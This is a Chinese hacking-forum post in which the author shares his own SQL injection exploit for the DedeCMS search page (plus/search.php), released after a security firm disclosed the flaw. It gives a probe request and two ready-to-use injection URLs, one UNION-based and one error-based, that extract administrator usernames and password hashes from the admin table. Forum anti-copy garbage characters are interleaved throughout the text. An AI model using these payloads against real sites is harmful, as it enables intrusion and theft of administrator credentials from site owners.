转载不加作者名的没JJ
' F+ T. |7 c- G& B0 R
: \; K2 r% k5 {% M, ~# F哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
C5 T2 t4 u1 _ g1 s' T
0 P# N4 L( G" U3 D* l# Z既然已经发出来了,我就把我自己搞的exp发下吧。。唉。9 o' W% P1 g6 q# |
S3 r' Z4 [. K* P p
我一般是这样测试的:8 u7 g1 |. d5 f' ?+ W6 `' x
$ X. Z$ ^! x5 W5 }4 t; S9 s
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
- F( i/ R* e& ]2 x' Y& q0 G" y+ d
' m4 B! g* r s0 U转载不加作者名的没JJ' D( U3 w# R. f
6 I" b! [4 U# b# h' P2 _# T) f |作者:鬼哥$ e( y& ~4 {) M' g9 ^( i, N$ f `
$ k6 x/ C. P$ \, F( ]9 T! R 3 A* c4 c4 X1 W2 j$ }4 c1 r& D9 \
/ f$ y% y* i) u9 [2 P0 A* n
看结果如果提示1 @! _/ |: }3 v, h
% v$ |( y: \* B, u8 ], {* K; R
Safe Alert: Request Error step 2 !; J) [+ q3 D. o0 Q1 R5 V5 q
; Q2 o8 }* @( W' T, X) C
那么直接用下面的exp
- l; `: T* q6 _8 U3 E3 d! I( s+ x
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a5 A/ d; t9 n$ D
0 {. X. I# q- n# M
! @4 t3 }6 R9 I0 l+ L0 I看结果如果提示
, V$ l. K$ U: t8 }# V
- Y" }9 b/ W4 R, {6 d9 Q' Y$ ~7 ?Safe Alert: Request Error step 1 !, O- J1 o N( R0 `/ P0 @5 x; V7 ?0 {6 A
% S9 k, R( ~- P# [$ l那么直接用下面的exp
% J3 a( u h1 m9 r; @8 a* E
9 @+ V3 n4 G& S% W4 }xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a$ Z! A5 ]$ E, q$ m4 U8 X# _4 k4 k
4 [8 P; v; y- W
0 K. h- w, |2 P& ^1 A5 T
如果正常显示证明漏洞不存在了。- y! M& l1 o; O
* ^9 K& c3 k7 i* P' ?# z8 K转载不加作者名的没JJ |